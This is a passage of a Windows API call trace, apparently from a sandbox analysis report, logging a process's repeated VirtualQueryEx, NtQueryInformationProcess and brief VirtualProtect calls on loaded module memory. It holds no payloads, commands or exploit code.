[0208.930] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973e20000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973e20000, AllocationBase=0x7ff973e20000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.930] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.930] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974340000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974340000, AllocationBase=0x7ff974340000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.930] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.931] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff969650000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff969650000, AllocationBase=0x7ff969650000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.931] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.931] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b770000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96b770000, AllocationBase=0x7ff96b770000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.931] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.931] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f790000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f790000, AllocationBase=0x7ff96f790000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.931] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.932] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973000000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973000000, AllocationBase=0x7ff973000000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.932] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.932] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9686a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9686a0000, AllocationBase=0x7ff9686a0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.932] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.932] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e4e0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96e4e0000, AllocationBase=0x7ff96e4e0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.932] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.933] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e3f0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96e3f0000, AllocationBase=0x7ff96e3f0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.933] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.933] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96ecc0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96ecc0000, AllocationBase=0x7ff96ecc0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.933] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.933] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9685b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9685b0000, AllocationBase=0x7ff9685b0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.933] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.934] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9684e0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9684e0000, AllocationBase=0x7ff9684e0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.934] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.934] VirtualProtect (in: lpAddress=0x7ff9685602a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.934] VirtualProtect (in: lpAddress=0x7ff9685602a0, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.935] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96fca0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96fca0000, AllocationBase=0x7ff96fca0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.935] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.935] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973070000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973070000, AllocationBase=0x7ff973070000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.935] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.935] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96b4f0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96b4f0000, AllocationBase=0x7ff96b4f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.935] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.936] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968470000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff968470000, AllocationBase=0x7ff968470000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.936] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.936] VirtualProtect (in: lpAddress=0x7ff968480338, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.936] VirtualProtect (in: lpAddress=0x7ff968480338, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.936] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9739b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9739b0000, AllocationBase=0x7ff9739b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.936] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.937] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9713b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9713b0000, AllocationBase=0x7ff9713b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.937] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.937] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973450000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973450000, AllocationBase=0x7ff973450000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.937] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.937] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9755b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9755b0000, AllocationBase=0x7ff9755b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.937] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.937] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968400000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff968400000, AllocationBase=0x7ff968400000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.937] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.938] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9683b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9683b0000, AllocationBase=0x7ff9683b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.938] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.938] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96e690000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96e690000, AllocationBase=0x7ff96e690000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.938] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.938] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973210000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973210000, AllocationBase=0x7ff973210000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.938] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.939] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f920000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f920000, AllocationBase=0x7ff96f920000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.939] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.939] VirtualProtect (in: lpAddress=0x7ff96f9c83e8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.939] VirtualProtect (in: lpAddress=0x7ff96f9c83e8, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.940] VirtualProtect (in: lpAddress=0x7ff96f9c8390, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.940] VirtualProtect (in: lpAddress=0x7ff96f9c8390, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.940] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971a40000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971a40000, AllocationBase=0x7ff971a40000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.940] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.941] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971310000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971310000, AllocationBase=0x7ff971310000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.941] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.941] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972b60000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972b60000, AllocationBase=0x7ff972b60000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.941] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.941] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff968360000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff968360000, AllocationBase=0x7ff968360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.941] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.941] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967ed0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967ed0000, AllocationBase=0x7ff967ed0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.941] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.955] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967eb0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967eb0000, AllocationBase=0x7ff967eb0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.955] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.955] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973ca0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973ca0000, AllocationBase=0x7ff973ca0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.955] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.955] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977650000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977650000, AllocationBase=0x7ff977650000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.955] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.955] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9673a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9673a0000, AllocationBase=0x7ff9673a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0208.955] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.968] VirtualProtect (in: lpAddress=0x7ff96797c088, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.969] VirtualProtect (in: lpAddress=0x7ff96797c088, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.969] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff96f2f0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff96f2f0000, AllocationBase=0x7ff96f2f0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.969] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.974] VirtualProtect (in: lpAddress=0x7ff96f3b9668, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x2) returned 1 [0208.975] VirtualProtect (in: lpAddress=0x7ff96f3b9668, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x235f4f0 | out: lpflOldProtect=0x235f4f0*=0x40) returned 1 [0208.975] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967350000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967350000, AllocationBase=0x7ff967350000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.975] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.975] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967340000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967340000, AllocationBase=0x7ff967340000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.975] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.975] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974bd0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974bd0000, AllocationBase=0x7ff974bd0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.975] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.976] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff967130000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff967130000, AllocationBase=0x7ff967130000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.976] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.976] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972a20000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972a20000, AllocationBase=0x7ff972a20000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.976] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.976] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff969b60000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff969b60000, AllocationBase=0x7ff969b60000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0208.976] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4f0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4f0, ReturnLength=0x0) returned 0x0 [0208.976] VirtualQueryEx (in: 